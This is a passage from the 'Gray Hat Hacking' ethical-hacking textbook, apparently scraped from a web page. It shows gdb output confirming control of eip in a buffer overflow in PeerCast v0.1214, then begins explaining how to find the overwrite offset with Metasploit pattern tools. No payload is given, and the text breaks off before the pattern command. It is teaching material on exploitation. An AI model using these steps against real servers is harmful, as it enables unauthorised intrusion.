..
[Switching to Thread 180236 (LWP 4526)]
0x41414141 in ?? ()
(gdb) i r eip
eip 0x41414141 0x41414141
(gdb)
As you can see, we have a classic buffer overflow and have total control of eip. Now that
we have accomplished the first step of the exploit development process, let??™smove to the
next step.
Determine the Offset(s)
With control of eip, we need to find out exactly how many characters it took to cleanly
overwrite eip (and nothing more). The easiest way to do this is with Metasploit??™s pattern
tools.
First, let??™s start the PeerCast v0.1214 server and attach our debugger with the following
commands:
#./peercast &
[1] 10794
#netstat ??“pan |grep 7144
tcp 0 0 0.0.0.:7144 0.0.0.0:* LISTEN 10794/peercast
Gray Hat Hacking: The Ethical Hacker??™s Handbook
164
As you can see, the process ID (PID) in our case was 10794; yours will be different. Now
we can attach to the process with gdb and tell gdb to follow all child processes:
#gdb ??“q
(gdb) set follow-fork-mode child
(gdb)attach 10794
---Output omitted for brevity---
Next we can use Metasploit to create a large pattern of characters and feed it to the
PeerCast server using the following perl command from within a Metasploit Framework
Cygshell.
Pages:
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339